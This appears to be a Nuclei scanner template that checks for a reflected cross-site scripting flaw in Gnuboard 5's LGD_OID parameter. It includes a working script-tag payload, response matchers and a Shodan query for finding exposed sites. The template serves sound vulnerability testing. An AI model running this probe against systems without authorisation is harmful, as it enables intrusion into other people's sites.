id: gnuboard5-rxss

info:
  name: Gnuboard 5 - Cross-Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Gnuboard 5 contains a cross-site scripting vulnerability via the $_GET['LGD_OID'] parameter.
  reference:
    - https://huntr.dev/bounties/ed317cde-9bd1-429e-b6d3-547e72534dd5/
    - https://vulners.com/huntr/25775287-88CD-4F00-B978-692D627DFF04
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cwe-id: CWE-80
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.html:"gnuboard5"
  tags: gnuboard,xss,huntr

http:
  - method: GET
    path:
      - "{{BaseURL}}/mobile/shop/lg/mispwapurl.php?LGD_OID=%3Cscript%3Ealert(document.domain)%3C/script%3E"

    matchers-condition: and
    matchers:
      - type: word
        words:
          - 'LGD_OID = <script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200

# digest: 4a0a0047304502205b038fa5bf97aa11aad7d60818e2c8ff42752244f4bbb9ed88d38d6b6d8f919d022100c740d18b4ee780312a9d4c4bb9105f5704daa8a3fe24ee3b1d0fd5576e213b8e:922c64590222798bb761d5b6d8e72950
